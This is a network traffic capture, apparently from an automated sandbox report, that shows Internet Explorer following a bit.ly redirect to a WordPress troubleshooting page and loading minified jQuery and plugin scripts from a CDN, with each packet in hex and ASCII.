66 28 72 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 77 28
                                                                                              Data Ascii: St=/^(?:submit|button|image|reset|file)$/i,kt=/^(?:input|select|textarea|keygen)/i;function At(n,e,r,i){var t;if(Array.isArray(e))S.each(e,function(e,t){r||Ct.test(n)?i(n,t):At(n+"["+("object"==typeof t&&null!=t?e:"")+"]",t,r,i)});else if(r||"object"!==w(
                                                                                              2021-12-13 23:57:32 UTC8660INData Raw: 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 28 76 2e 64 61 74 61 3d 76 2e 64 61 74 61 2e 72 65 70 6c 61 63 65 28 4e 74 2c 22 2b 22 29 29 3a 28 6f 3d 76 2e 75 72 6c 2e 73 6c 69 63 65 28 66 2e 6c 65 6e 67 74 68 29 2c 76 2e 64 61 74 61 26 26 28 76 2e 70 72 6f 63 65 73 73 44 61 74 61 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 76 2e 64 61 74 61 29 26 26 28 66 2b 3d 28 54 74 2e 74 65 73 74 28 66 29 3f 22 26 22 3a 22 3f 22 29 2b 76 2e 64 61 74 61 2c 64 65 6c 65 74 65 20 76 2e 64 61 74 61 29 2c 21 31 3d 3d 3d 76 2e 63 61 63 68 65 26 26 28 66 3d 66 2e 72 65 70 6c 61 63 65 28 44 74 2c 22 24 31 22 29 2c 6f 3d 28 54 74 2e 74 65 73 74 28 66 29 3f 22 26 22 3a 22 3f 22 29
                                                                                              Data Ascii: exOf("application/x-www-form-urlencoded")&&(v.data=v.data.replace(Nt,"+")):(o=v.url.slice(f.length),v.data&&(v.processData||"string"==typeof v.data)&&(f+=(Tt.test(f)?"&":"?")+v.data,delete v.data),!1===v.cache&&(f=f.replace(Dt,"$1"),o=(Tt.test(f)?"&":"?")
                                                                                              2021-12-13 23:57:32 UTC8664INData Raw: 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 43 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 72 20 42 74 3d 7b 30 3a 32 30 30 2c 31 32 32 33 3a 32 30 34 7d 2c 24 74 3d 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 28 29 3b 79 2e 63 6f 72 73 3d 21 21 24 74 26 26 22 77 69 74 68 43 72 65 64 65 6e
                                                                                              Data Ascii: e(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},S.ajaxSettings.xhr=function(){try{return new C.XMLHttpRequest}catch(e){}};var Bt={0:200,1223:204},$t=S.ajaxSettings.xhr();y.cors=!!$t&&"withCreden
                                                                                              2021-12-13 23:57:32 UTC8668INData Raw: 2e 63 61 6c 6c 28 65 2c 6e 2c 53 2e 65 78 74 65 6e 64 28 7b 7d 2c 73 29 29 29 2c 6e 75 6c 6c 21 3d 74 2e 74 6f 70 26 26 28 66 2e 74 6f 70 3d 74 2e 74 6f 70 2d 73 2e 74 6f 70 2b 61 29 2c 6e 75 6c 6c 21 3d 74 2e 6c 65 66 74 26 26 28 66 2e 6c 65 66 74 3d 74 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2b 69 29 2c 22 75 73 69 6e 67 22 69 6e 20 74 3f 74 2e 75 73 69 6e 67 2e 63 61 6c 6c 28 65 2c 66 29 3a 63 2e 63 73 73 28 66 29 7d 7d 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 6f 66 66 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 3f 74 68 69 73 3a 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 6f 66 66 73 65 74 2e 73 65 74 4f 66 66 73
                                                                                              Data Ascii: .call(e,n,S.extend({},s))),null!=t.top&&(f.top=t.top-s.top+a),null!=t.left&&(f.left=t.left-s.left+i),"using"in t?t.using.call(e,f):c.css(f)}},S.fn.extend({offset:function(t){if(arguments.length)return void 0===t?this:this.each(function(e){S.offset.setOffs
                                                                                              2021-12-13 23:57:32 UTC8671INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              19192.168.2.349780104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8502OUTGET /js/websetnet.net/wp-content/plugins/cfmonitor/js/check_min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8602INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a6ceb67034-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"9793487938f4b64f435c7fbab09310cff46486522ece10831ef8929ac6f17e19"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga13625-LGA, cache-fra19129-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8603INData Raw: 33 31 35 34 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 2c 74 2c 6e 3d 63 66 6d 6f 6e 69 74 6f 72 2e 69 73 5f 62 6c 6f 63 6b 65 64 2c 69 3d 63 66 6d 6f 6e 69 74 6f 72 2e 6e 6f 6e 63 65 2c 73 3d 63 66 6d 6f 6e 69 74 6f 72 2e 61 6a 61 78 75 72 6c 2c 6c 3d 63 66 6d 6f 6e 69 74 6f 72 2e 63 75 72 72 65 6e 74 55 52 4c 2c 61 3d 63 66 6d 6f 6e 69 74 6f 72 2e 64 65 62 75 67 2c 63 3d 6e 75 6c 6c 21 3d 63 66 6d 6f 6e 69 74 6f 72 2e 63 75 73 74 6f 6d 63 6c 61 73 73 26 26 22 22 21 3d 3d 63 66 6d 6f 6e 69 74 6f 72 2e 63 75 73 74 6f 6d 63 6c 61 73 73 3f 63 66 6d 6f 6e 69 74 6f 72 2e 63 75 73 74 6f 6d 63 6c 61 73 73 3a 22 63 66 6d 6f 6e 69 74 6f 72 22 2c 72 3d 6e 75 6c 6c 21 3d 63 66 6d 6f
                                                                                              Data Ascii: 3154jQuery(document).ready(function(e){var o,t,n=cfmonitor.is_blocked,i=cfmonitor.nonce,s=cfmonitor.ajaxurl,l=cfmonitor.currentURL,a=cfmonitor.debug,c=null!=cfmonitor.customclass&&""!==cfmonitor.customclass?cfmonitor.customclass:"cfmonitor",r=null!=cfmo
                                                                                              2021-12-13 23:57:32 UTC8604INData Raw: 75 6e 63 74 69 6f 6e 20 79 28 29 7b 75 2e 65 61 63 68 28 75 2e 63 66 6d 6f 6e 69 74 6f 72 2e 65 6c 65 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 69 66 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 6f 29 2c 62 28 22 69 66 72 61 6d 65 20 66 6f 75 6e 64 3a 20 22 2b 75 28 6f 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 2e 6c 65 6e 67 74 68 29 2c 75 28 6f 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 2e 6c 65 6e 67 74 68 29 7b 62 28 22 69 66 72 61 6d 65 20 77 69 74 68 69 6e 20 63 75 73 74 6f 6d 20 63 6c 61 73 73 20 66 6f 75 6e 64 3a 20 22 2b 75 28 6f 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 29 3b 76 61 72 20 74 3d 75 28 6f 29 2e 66 69 6e 64 28 22 69 66 72 61 6d 65 22 29 3b 62 28 22 66 72 61 6d 65 20 66 6f 75 6e 64 3a 20 22 2b 74 29 2c 74
                                                                                              Data Ascii: unction y(){u.each(u.cfmonitor.elements,function(e,o){if(console.log(o),b("iframe found: "+u(o).find("iframe").length),u(o).find("iframe").length){b("iframe within custom class found: "+u(o).find("iframe"));var t=u(o).find("iframe");b("frame found: "+t),t
                                                                                              2021-12-13 23:57:32 UTC8605INData Raw: 70 3d 21 31 2c 74 6f 70 2e 66 6f 63 75 73 28 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 29 7b 62 28 22 6d 6f 75 73 65 20 6f 76 65 72 22 29 2c 70 3d 21 30 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 70 26 26 28 62 28 22 6d 6f 75 73 65 20 66 72 61 6d 65 20 63 6c 69 63 6b 22 29 2c 67 28 29 2c 74 6f 70 2e 66 6f 63 75 73 28 29 29 7d 77 69 6e 64 6f 77 2e 6f 6e 70 61 67 65 73 68 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 65 72 73 69 73 74 65 64 26 26 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 7d 2c 75 2e 63 66 6d 6f 6e 69 74 6f 72 2e 65 6c 65 6d 65 6e 74 73 3d 5b 5d 2c 6d 2e 64 65 66 61 75 6c 74 45 6c 65 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 28 62 28 22 64 65 66 61 75 6c 74 20 45 6c 65 6d 20 66 6f 75 6e 64 3a 20 22 2b
                                                                                              Data Ascii: p=!1,top.focus()}function w(){b("mouse over"),p=!0}function U(){p&&(b("mouse frame click"),g(),top.focus())}window.onpageshow=function(e){e.persisted&&window.location.reload()},u.cfmonitor.elements=[],m.defaultElements.length>0&&(b("default Elem found: "+
                                                                                              2021-12-13 23:57:32 UTC8607INData Raw: 7b 7d 2c 65 2e 62 6c 6f 63 6b 55 49 28 7b 6d 65 73 73 61 67 65 3a 73 2c 66 61 64 65 49 6e 3a 76 6f 69 64 20 30 21 3d 3d 6f 2e 66 61 64 65 49 6e 3f 6f 2e 66 61 64 65 49 6e 3a 37 30 30 2c 66 61 64 65 4f 75 74 3a 76 6f 69 64 20 30 21 3d 3d 6f 2e 66 61 64 65 4f 75 74 3f 6f 2e 66 61 64 65 4f 75 74 3a 31 65 33 2c 74 69 6d 65 6f 75 74 3a 76 6f 69 64 20 30 21 3d 3d 6f 2e 74 69 6d 65 6f 75 74 3f 6f 2e 74 69 6d 65 6f 75 74 3a 6e 2c 63 65 6e 74 65 72 59 3a 21 31 2c 73 68 6f 77 4f 76 65 72 6c 61 79 3a 21 31 2c 6f 6e 55 6e 62 6c 6f 63 6b 3a 69 2c 63 73 73 3a 65 2e 62 6c 6f 63 6b 55 49 2e 64 65 66 61 75 6c 74 73 2e 67 72 6f 77 6c 43 53 53 7d 29 7d 3b 6c 28 29 3b 73 2e 63 73 73 28 22 6f 70 61 63 69 74 79 22 29 3b 73 2e 6d 6f 75 73 65 6f 76 65 72 28 66 75 6e 63 74 69 6f
                                                                                              Data Ascii: {},e.blockUI({message:s,fadeIn:void 0!==o.fadeIn?o.fadeIn:700,fadeOut:void 0!==o.fadeOut?o.fadeOut:1e3,timeout:void 0!==o.timeout?o.timeout:n,centerY:!1,showOverlay:!1,onUnblock:i,css:e.blockUI.defaults.growlCSS})};l();s.css("opacity");s.mouseover(functio
                                                                                              2021-12-13 23:57:32 UTC8608INData Raw: 75 6e 64 43 6f 6c 6f 72 3a 22 23 30 30 30 22 2c 22 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 31 30 70 78 22 2c 22 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 31 30 70 78 22 2c 22 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 31 30 70 78 22 7d 2c 69 66 72 61 6d 65 53 72 63 3a 2f 5e 68 74 74 70 73 2f 69 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 7c 7c 22 22 29 3f 22 6a 61 76 61 73 63 72 69 70 74 3a 66 61 6c 73 65 22 3a 22 61 62 6f 75 74 3a 62 6c 61 6e 6b 22 2c 66 6f 72 63 65 49 66 72 61 6d 65 3a 21 31 2c 62 61 73 65 5a 3a 31 65 33 2c 63 65 6e 74 65 72 58 3a 21 30 2c 63 65 6e 74 65 72 59 3a 21 30 2c 61 6c 6c 6f 77 42 6f 64 79 53 74 72 65 74 63 68 3a 21 30 2c 62 69 6e 64 45
                                                                                              Data Ascii: undColor:"#000","-webkit-border-radius":"10px","-moz-border-radius":"10px","border-radius":"10px"},iframeSrc:/^https/i.test(window.location.href||"")?"javascript:false":"about:blank",forceIframe:!1,baseZ:1e3,centerX:!0,centerY:!0,allowBodyStretch:!0,bindE
                                                                                              2021-12-13 23:57:32 UTC8609INData Raw: 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 22 20 73 72 63 3d 22 27 2b 72 2e 69 66 72 61 6d 65 53 72 63 2b 27 22 3e 3c 2f 69 66 72 61 6d 65 3e 27 29 3a 65 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 55 49 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 27 29 2c 76 3d 72 2e 74 68 65 6d 65 3f 65 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 55 49 20 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 20 75 69 2d 77 69 64 67 65 74 2d 6f 76 65 72 6c 61 79 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 27 2b 55 2b 2b 2b 27 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e
                                                                                              Data Ascii: :0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0" src="'+r.iframeSrc+'"></iframe>'):e('<div class="blockUI" style="display:none"></div>'),v=r.theme?e('<div class="blockUI blockOverlay ui-widget-overlay" style="z-index:'+U+++';display:non
                                                                                              2021-12-13 23:57:32 UTC8611INData Raw: 62 26 26 28 72 2e 74 68 65 6d 65 3f 28 49 2e 63 73 73 28 70 29 2c 49 2e 61 64 64 43 6c 61 73 73 28 22 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 22 29 29 3a 49 2e 63 73 73 28 75 29 29 2c 72 2e 74 68 65 6d 65 7c 7c 76 2e 63 73 73 28 72 2e 6f 76 65 72 6c 61 79 43 53 53 29 2c 76 2e 63 73 73 28 22 70 6f 73 69 74 69 6f 6e 22 2c 68 3f 22 66 69 78 65 64 22 3a 22 61 62 73 6f 6c 75 74 65 22 29 2c 28 74 7c 7c 72 2e 66 6f 72 63 65 49 66 72 61 6d 65 29 26 26 79 2e 63 73 73 28 22 6f 70 61 63 69 74 79 22 2c 30 29 3b 76 61 72 20 78 3d 5b 79 2c 76 2c 49 5d 2c 43 3d 65 28 68 3f 22 62 6f 64 79 22 3a 61 29 3b 65 2e 65 61 63 68 28 78 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 61 70 70 65 6e 64 54 6f 28 43 29 7d 29 2c 72 2e 74 68 65 6d 65 26 26 72 2e 64 72 61
                                                                                              Data Ascii: b&&(r.theme?(I.css(p),I.addClass("ui-widget-content")):I.css(u)),r.theme||v.css(r.overlayCSS),v.css("position",h?"fixed":"absolute"),(t||r.forceIframe)&&y.css("opacity",0);var x=[y,v,I],C=e(h?"body":a);e.each(x,function(){this.appendTo(C)}),r.theme&&r.dra
                                                                                              2021-12-13 23:57:32 UTC8612INData Raw: 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 20 3a 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 29 20 2b 20 22 70 78 22 27 29 2c 74 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 3b 65 6c 73 65 20 69 66 28 21 72 2e 63 65 6e 74 65 72 59 26 26 68 29 7b 76 61 72 20 6e 3d 22 28 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 20 3f 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 20 3a 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 29 20 2b 20 22 2b 28 72 2e 63 73 73 26 26 72 2e 63 73 73 2e 74 6f 70 3f 70 61 72 73 65 49 6e 74 28 72 2e 63 73 73 2e 74 6f 70 2c 31 30 29 3a 30 29 2b 27 29 20 2b 20 22 70 78 22 27 3b 74 2e
                                                                                              Data Ascii: nt.scrollTop : document.body.scrollTop) + "px"'),t.marginTop=0;else if(!r.centerY&&h){var n="((document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "+(r.css&&r.css.top?parseInt(r.css.top,10):0)+') + "px"';t.
                                                                                              2021-12-13 23:57:32 UTC8614INData Raw: 79 22 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 66 69 6c 74 65 72 28 22 2e 62 6c 6f 63 6b 55 49 22 29 2e 61 64 64 28 22 62 6f 64 79 20 3e 20 2e 62 6c 6f 63 6b 55 49 22 29 3a 63 2e 66 69 6e 64 28 22 3e 2e 62 6c 6f 63 6b 55 49 22 29 2c 74 2e 63 75 72 73 6f 72 52 65 73 65 74 26 26 28 69 2e 6c 65 6e 67 74 68 3e 31 26 26 28 69 5b 31 5d 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 74 2e 63 75 72 73 6f 72 52 65 73 65 74 29 2c 69 2e 6c 65 6e 67 74 68 3e 32 26 26 28 69 5b 32 5d 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 74 2e 63 75 72 73 6f 72 52 65 73 65 74 29 29 2c 61 26 26 28 73 3d 6c 3d 6e 75 6c 6c 29 2c 74 2e 66 61 64 65 4f 75 74 3f 28 6e 3d 69 2e 6c 65 6e 67 74 68 2c 69 2e 73 74 6f 70 28 29 2e 66 61 64 65 4f 75 74 28 74 2e 66 61 64 65 4f 75 74 2c 66 75 6e 63 74 69
                                                                                              Data Ascii: y").children().filter(".blockUI").add("body > .blockUI"):c.find(">.blockUI"),t.cursorReset&&(i.length>1&&(i[1].style.cursor=t.cursorReset),i.length>2&&(i[2].style.cursor=t.cursorReset)),a&&(s=l=null),t.fadeOut?(n=i.length,i.stop().fadeOut(t.fadeOut,functi
                                                                                              2021-12-13 23:57:32 UTC8616INData Raw: 43 6c 69 63 6b 28 29 2c 63 2e 70 61 72 65 6e 74 73 28 22 64 69 76 2e 22 2b 61 2e 62 6c 6f 63 6b 4d 73 67 43 6c 61 73 73 29 2e 6c 65 6e 67 74 68 3e 30 7c 7c 30 3d 3d 3d 63 2e 70 61 72 65 6e 74 73 28 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 66 69 6c 74 65 72 28 22 64 69 76 2e 62 6c 6f 63 6b 55 49 22 29 2e 6c 65 6e 67 74 68 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 69 66 28 6c 29 7b 76 61 72 20 6f 3d 6c 5b 21 30 3d 3d 3d 65 3f 6c 2e 6c 65 6e 67 74 68 2d 31 3a 30 5d 3b 6f 26 26 6f 2e 66 6f 63 75 73 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 6f 2c 74 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 65 2e 63 73 73 28 6f 2c 74 29 2c 31 30 29 7c 7c 30 7d 7d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65
                                                                                              Data Ascii: Click(),c.parents("div."+a.blockMsgClass).length>0||0===c.parents().children().filter("div.blockUI").length}function f(e){if(l){var o=l[!0===e?l.length-1:0];o&&o.focus()}}function m(o,t){return parseInt(e.css(o,t),10)||0}}"function"==typeof define&&define
                                                                                              2021-12-13 23:57:32 UTC8616INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.34975867.199.248.10443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:31 UTC8087OUTGET /3DvoVCc HTTP/1.1
                                                                                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: bit.ly
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:31 UTC8087INHTTP/1.1 301 Moved Permanently
                                                                                              Server: nginx
                                                                                              Date: Mon, 13 Dec 2021 23:57:31 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 175
                                                                                              Cache-Control: private, max-age=90
                                                                                              Content-Security-Policy: referrer always;
                                                                                              Location: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Referrer-Policy: unsafe-url
                                                                                              Set-Cookie: _bit=lbdnVv-742e821d46671177d0-00V; Domain=bit.ly; Expires=Sat, 11 Jun 2022 23:57:31 GMT
                                                                                              Via: 1.1 google
                                                                                              Alt-Svc: clear
                                                                                              Connection: close
                                                                                              2021-12-13 23:57:31 UTC8088INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 70 74 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 67 6f 6f 67 6c 65 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google">moved here</a></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              20192.168.2.349781104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8671OUTGET /js/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8672INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a72f67dfc3-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"9cc3ed2e89818ce7d0bd13626ecddb9f92de7ccb1cb5b5587481293228546df9"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-BO-LB-Server: LA-156
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga21978-LGA, cache-fra19145-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8673INData Raw: 62 63 33 0d 0a 76 61 72 20 77 70 70 5f 70 61 72 61 6d 73 3d 6e 75 6c 6c 2c 57 6f 72 64 50 72 65 73 73 50 6f 70 75 6c 61 72 50 6f 73 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 68 3d 21 21 48 54 4d 4c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 74 74 61 63 68 53 68 61 64 6f 77 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 61 2c 67 2c 6b 29 7b 76 61 72 20 65 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 62 3d 2d 31 21 3d 5b 22 47 45 54 22 2c 22 50 4f 53 54 22 5d 2e 69 6e 64 65 78 4f 66 28 62 29 3f 62 3a 22 47 45 54 22 3b 76 61 72 20 64 3d 7b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 3a 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 7d 3b 22 50 4f 53 54 22 3d 3d
                                                                                              Data Ascii: bc3var wpp_params=null,WordPressPopularPosts=function(){var m=function(){},h=!!HTMLElement.prototype.attachShadow,f=function(b,c,a,g,k){var e=new XMLHttpRequest;b=-1!=["GET","POST"].indexOf(b)?b:"GET";var d={"X-Requested-With":"XMLHttpRequest"};"POST"==
